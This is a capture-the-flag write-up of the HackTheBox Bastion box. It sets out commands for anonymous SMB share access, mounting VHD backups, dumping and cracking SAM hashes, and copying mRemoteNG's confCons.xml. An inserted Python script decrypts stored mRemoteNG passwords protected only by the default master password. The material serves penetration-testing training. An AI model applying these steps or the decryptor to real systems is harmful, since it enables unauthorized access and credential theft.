Mounting VHD Files and Windows Privilege Escalation | HackTheBox Bastion | CREST CRT Track
HackTheBox Bastion was a reliable, easy-to-use box that presented just a few minor difficulties, such as mounting a VHD from a file share and extracting credentials from a password vault program. It begins, somewhat unusually, without a website; instead, there are VHD images stored on an SMB share. Once mounted, these images give access to the registry hives needed to recover credentials, and those credentials let us SSH into the host. We’ll exploit the mRemoteNG installation to pull the profile data and encrypted passwords, then demonstrate multiple techniques to decrypt them in order to gain Administrator access. Once we know the Administrator password, we can SSH in as Administrator.
Initial Reconnaissance and Enumeration
I kicked things off with an nmap scan to sniff out open ports and services on the target machine. I used the command:
nmap -A <target_IP>
This -A switch is super handy because it enables OS detection, version detection, script scanning, and even a traceroute. The scan quickly told me that Port 22 (SSH) was open, the machine was likely running Windows Server 2016, and an SMB server was active. I also discovered the NetBIOS computer name was “bastion.tates.” To make things easier, I added the DNS name to my local /etc/hosts file. I did this by opening the file with sudo nano /etc/hosts and then verifying the entry with grep Bastion /etc/hosts.
SMB Share Enumeration and Access
Since SMB was up and running, and the nmap scan hinted at “guest” account usage, I tried to list shares anonymously using SMBMap. My command for that was:
smbmap -u anonymous -H <target_IP>
This revealed a “backups” share with read and write permissions! Naturally, I then connected to it using SMBClient:
smbclient //<target_IP>/backups -U ""
I just hit enter when it asked for a password. Inside, I found a “note.txt” file and a “WindowsImageBackup” directory. I used dir to list the files and get note.txt to download the note.
Analyzing Backup Files (VHD)
The “note.txt” warned against downloading the huge backup locally, which made sense given the slow VPN. The “WindowsImageBackup” directory contained large VHD (Virtual Hard Disk) files. To peek inside without downloading them, I decided to mount the SMB share locally. The command I used was something like:
sudo mount -t cifs //<target_IP>/backups /path/to/local/mountpoint -o username=anonymous
After mounting the share, I used guestmount (from libguestfs-tools) to mount the VHD files themselves, read-only. This allowed me to explore the Windows file system within the backup without downloading the whole image! For example, for one of the VHD files, the command looked like:
sudo guestmount --add /path/to/local/mountpoint/WindowsImageBackup/BASTION/Backup\ 2023-04-26\ 120000/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx.vhd -i --ro /mnt/vhd_mountpoint
I had to remember to use \ to escape any spaces in the file or directory names.
Dumping Hashes
With the VHD mounted, my next goal was to extract password hashes from the SAM and SYSTEM hives, which are usually found in Windows/System32/config within the mounted VHD. I copied these files to my local machine using commands like:
sudo cp /mnt/vhd_mountpoint/Windows/System32/config/SYSTEM /path/to/desktop/
sudo cp /mnt/vhd_mountpoint/Windows/System32/config/SAM /path/to/desktop/
Then, I used Samdump2 to extract the hashes:
samdump2 SYSTEM SAM
This revealed a hash for a user, which I then cracked using an online tool like CrackStation to get the password.
Gaining User Access and Privilege Escalation
With the password in hand, I logged in via SSH as the user “L4mpje” using:
ssh L4mpje@<target_IP>
I quickly grabbed the user flag from the desktop. For privilege escalation, I considered tools like WinPEAS, PowerView, or PowerSploit, but then I spotted mRemoteNG installed in Program Files (x86). mRemoteNG is known to store connection passwords in an XML configuration file, sometimes in plain text or in an easily decryptable format (by default, encrypted with a fixed, publicly known master password). I found the confCons.xml file in C:\Users\<username>\AppData\Roaming\mRemoteNG.
To get it to my local machine, I used SCP (Secure Copy Protocol):
scp L4mpje@<target_IP>:/Users/L4mpje/AppData/Roaming/MRemoteNG/confCons.xml .
The XML file contained an encrypted password for an RDP session with the username “Administrator.” To decrypt it, I used a specific Python script called MRemoteNG Decryptor:
python3 mremoteng_decrypt.py -s <encrypted_password_string>
This gave me the Administrator password!
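To make the decryption step concrete from an auditor's point of view, here is an added example (not the author's script or mRemoteNG's own code) that parses a confCons.xml in the AES-GCM layout and recovers each connection's password when only the default master password protects the file. It assumes the scheme the public decryptors implement (a 16-byte salt, 16-byte nonce, ciphertext and 16-byte tag, base64-encoded, with an AES-256 key from PBKDF2-HMAC-SHA1 over the file's KdfIterations) and the default master password mR3m; the XML and the password in it are constructed, and the cryptography package is required.

```python
import base64
import hashlib
import os
import xml.etree.ElementTree as ET
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

DEFAULT_MASTER_PASSWORD = b"mR3m"  # mRemoteNG's built-in default when the user sets no master password

# Constructed sample in the shape of confCons.xml (not a captured file); the Password blob is
# filled in by build_sample_config() using encrypt_blob() so the round trip can be checked.
SAMPLE_TEMPLATE = (
    '<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" EncryptionEngine="AES" '
    'BlockCipherMode="GCM" KdfIterations="1000" ConfVersion="2.6">'
    '<Node Name="DC" Type="Connection" Username="Administrator" Domain="" Hostname="127.0.0.1" '
    'Protocol="RDP" Port="3389" Password="{blob}" /></mrng:Connections>'
)

def derive_key(master_password: bytes, salt: bytes, iterations: int) -> bytes:
    # AES-256 key = PBKDF2-HMAC-SHA1(master password, salt) over the file's KdfIterations count
    return hashlib.pbkdf2_hmac("sha1", master_password, salt, iterations, dklen=32)

def decrypt_blob(blob_b64: str, master_password: bytes, iterations: int) -> str:
    # Blob layout: 16-byte salt | 16-byte nonce | ciphertext | 16-byte GCM tag; the salt doubles as AAD
    raw = base64.b64decode(blob_b64)
    salt, nonce, ct_and_tag = raw[:16], raw[16:32], raw[32:]
    key = derive_key(master_password, salt, iterations)
    return AESGCM(key).decrypt(nonce, ct_and_tag, salt).decode("utf-8")

def encrypt_blob(plaintext: str, master_password: bytes, iterations: int) -> str:
    # Inverse of decrypt_blob, used here only to construct sample data in the same layout
    salt, nonce = os.urandom(16), os.urandom(16)
    key = derive_key(master_password, salt, iterations)
    ct_and_tag = AESGCM(key).encrypt(nonce, plaintext.encode("utf-8"), salt)
    return base64.b64encode(salt + nonce + ct_and_tag).decode("ascii")

def build_sample_config(password: str = "S3cr3t-RDP!") -> str:
    return SAMPLE_TEMPLATE.format(blob=encrypt_blob(password, DEFAULT_MASTER_PASSWORD, 1000))

def recover_connections(xml_text: str, master_password: bytes = DEFAULT_MASTER_PASSWORD) -> list:
    # Every <Node Type="Connection"> carries its own blob; the KDF iteration count lives on the root
    root = ET.fromstring(xml_text)
    iterations = int(root.get("KdfIterations", "1000"))
    results = []
    for node in root.iter("Node"):
        if node.get("Type") != "Connection" or not node.get("Password"):
            continue
        results.append({"name": node.get("Name"),
                        "target": f"{node.get('Username')}@{node.get('Hostname')} ({node.get('Protocol')})",
                        "password": decrypt_blob(node.get("Password"), master_password, iterations)})
    return results
```

A file protected by a real master password fails the GCM tag check (InvalidTag) under mR3m, which is the quick way to tell a hardened config from a default one.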
Gaining Administrator Access
Finally, I used the decrypted Administrator password to log in via SSH as Administrator:
ssh Administrator@<target_IP>
And just like that, I was able to retrieve the root flag! The most valuable new technique I picked up from this challenge was definitely mounting and navigating VHD files using guestmount.